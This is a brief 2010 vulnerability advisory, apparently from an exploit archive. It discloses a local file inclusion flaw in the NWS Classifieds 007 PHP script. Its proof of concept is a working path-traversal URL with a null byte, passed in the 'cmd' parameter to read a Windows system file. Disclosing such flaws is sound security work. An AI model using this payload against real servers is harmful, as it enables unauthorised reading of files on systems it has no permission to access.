NWS Classifieds 007 Local File Inclusion

`------------------------------------------------------------------------  
Software................NWS Classifieds 007  
Vulnerability...........Local File Inclusion  
Download................http://webscripts.softpedia.com/script/Ad-Management/Classified-Ads/NWS-Classifieds-35000.html  
Release Date............9/15/2010  
Tested On...............Windows Vista + XAMPP  
------------------------------------------------------------------------  
Author..................John Leitch  
Site....................http://www.johnleitch.net/  
[email protected]  
------------------------------------------------------------------------  
  
--Description--  
  
A local file inclusion vulnerability in NWS Classifieds 007 can be  
exploited to include arbitrary files.  
  
  
--PoC--  
  
http://localhost/nws_classifieds007/index.php?cmd=../../../../../../../../windows/system.ini%00  
`